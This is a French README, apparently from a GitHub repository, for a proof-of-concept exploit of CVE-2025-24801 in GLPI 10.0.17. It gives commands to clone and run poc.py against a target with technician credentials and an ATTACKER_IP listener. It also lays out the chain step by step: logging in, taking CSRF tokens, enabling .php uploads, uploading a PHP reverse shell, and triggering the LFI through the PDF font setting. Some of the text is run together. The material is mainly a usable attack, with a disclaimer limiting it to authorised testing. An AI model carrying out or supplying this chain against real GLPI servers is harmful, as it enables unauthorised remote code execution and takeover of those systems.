
Exploit de preuve de concept pour CVE-2025-24801, une vulnérabilité LFI-à-RCE dans GLPI 10.0.17. Automatise la connexion, active les téléchargements PHP et télécharge un shell inversé pour les tests de sécurité autorisés.
Ce dépôt contient un script de preuve de concept (poc.py) qui exploite CVE-2025-24801, une vulnérabilité LFI vers RCE dans GLPI 10.0.17. Il automatise :
.php en mettant à jour les paramètres de type de documentgit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url : URL de base de l'instance GLPI (ex. )https://example.com/glpi--user / --password : Identifiants valides d'un technicien GLPI--lhost / --lport : Adresse IP et port de l'attaquant pour l'écoute du shell reverseLe script utilise automatiquement --doc-id 1 par défaut pour mettre à jour le premier type de document.
Après exécution, le script va :
.php en mettant à jour le type de document ID 1exploit.php contenant une charge utile de shell reverse PHPVous devrez ensuite déclencher manuellement la LFI en spécifiant le nom du fichier téléversé dans l'inclusion de police PDF (par exemple via la fonction d'export de rapport) pour obtenir une RCE.
/front/login.php et soumet les identifiants pour s'authentifier./front/documenttype.form.php?id=1, parse le jeton CSRF, et ajoute php aux extensions autorisées./front/ticket.form.php pour un jeton CSRF, puis utilise /ajax/fileupload.php (avec X-Requested-With: XMLHttpRequest) pour téléverser un shell reverse PHP.pdffont lors de l'export de rapport.Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. Ne l'utilisez pas contre des systèmes sans autorisation explicite.
Créé à des fins éducatives et de test d'intrusion autorisé.